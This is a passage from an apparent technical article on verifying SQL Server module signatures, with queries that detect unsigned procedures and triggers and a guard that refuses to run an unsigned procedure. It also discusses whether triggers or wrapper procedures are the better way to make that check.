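SELECT o.name, o.type_desc
FROM sys.objects o
WHERE o.is_ms_shipped = 0
  AND o.type IN ('P', 'FN', 'TF', 'IF', 'TR')   -- procs, functions, triggers
  AND ISNULL(IS_OBJECTSIGNED('OBJECT', o.object_id, 'CERTIFICATE',
        (SELECT c.thumbprint
         FROM sys.certificates c
         WHERE c.name = N'SigCert')), 0) = 0;
```

Comparing the signed list against a trusted manifest of expected object names would additionally catch the case of a signed object that has been dropped outright.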
A digital object that is expected to check its own signature is fatally flawed. This would be like airport security using the honor system, nuclear power regulators deferring to the plant operators to establish safety levels, or airline pilots left to judge their own sobriety before flight. Self-policing strategies are effective in well over 99% of cases, and very cost-effective, until there is an event that falls into that remaining fraction of a percent. A significantly more reliable and consistent outcome results when the signature is always verified by a trusted outsider. (Ultimately this is the reason that outside accounting firms are needed to count the votes in an awards show, that there are observers at polling locations, that "fact checking" has become a political pastime, and that neighbors are nosey: simply to bear witness to the obvious and expose, or get mysteriously wealthy over, the occasional anomaly.)
A higher assurance that any entity is what it claims to be will come from a reliable source external to and independent of that entity than from the entity itself. This is why auditors are in great demand and the words "fact checking" garner such attention in the title of an article or news story. This external check could be done, in our scenario:
- by introducing a trigger behind the table
- via a called module (a stored procedure) placed between the external request and the table operation
- as a check constraint or default value.
Also, to be able to claim the current process as the scope for verification of trust, the validity of each called module and referenced object needs to be verified before use, and the signature of each calling module ought to be verified before control is returned to it. That leaves defaults and constraints less useful, since they may not fire with every process that uses the data.
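The verify-before-use half of that rule can be sketched as a guard around the call site. The module and certificate names here follow the earlier script; the pattern, not the names, is the point:

```sql
-- Sketch: refuse to call dbo.get_results unless it still carries
-- a valid signature from the SigCert certificate.
IF ISNULL(IS_OBJECTSIGNED('OBJECT', OBJECT_ID(N'dbo.get_results'),
            'CERTIFICATE',
            (SELECT thumbprint
             FROM sys.certificates
             WHERE name = N'SigCert')), 0) = 1
    EXEC dbo.get_results;
ELSE
    RAISERROR('signature missing or invalid on dbo.get_results', 16, 1);
```

Because any ALTER to a signed module silently drops its signature, this check catches drift between source control and the live object at the moment it matters.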
A called stored procedure or a trigger will do; a view cannot be signed. It may be a little less confounding for the developer not to have to create two stored procedures to do one thing. Using a trigger also allows a division of responsibility and keeps everyone from having to know every business rule to succeed. Perhaps the DBA takes ownership of the triggers or called procedure(s) that verify the authenticity of the participants, allowing the developers to continue to code mostly unaffected by, and unaware of, the signature trigger logic and the other defensive layers enveloping the application logic. All in all, a trigger is probably a better way to impose corroboration than the addition of a second stored procedure, in my opinion, but not by much. This is one of the few scenarios where triggers are in fact appropriate: to keep the encryption complexity from getting in the way of progress. On the other hand, if the database supports abstraction layers (ORM, OOP) that would suffer serious side effects or degradation from a trigger, then an additional stored procedure or view introduced into this now obviously security-sensitive application is mandated to assure the authenticity of the communication.
If you are looking for this level of assurance of authenticity through your ORM: fagetaboutit. Man-in-the-middle protection at the ORM data access layer is essential, but it must be done well outside the bounds of the data layer. You still want to do everything described here to protect and monitor at the database server; in addition, it is necessary to apply similar protection at the ORM layer.
FWIW: the original hack of tacking on a second INSTEAD OF trigger no longer works, due to the limit of one INSTEAD OF trigger per action. The legitimate trigger uses up the one allowed trigger on all three actions.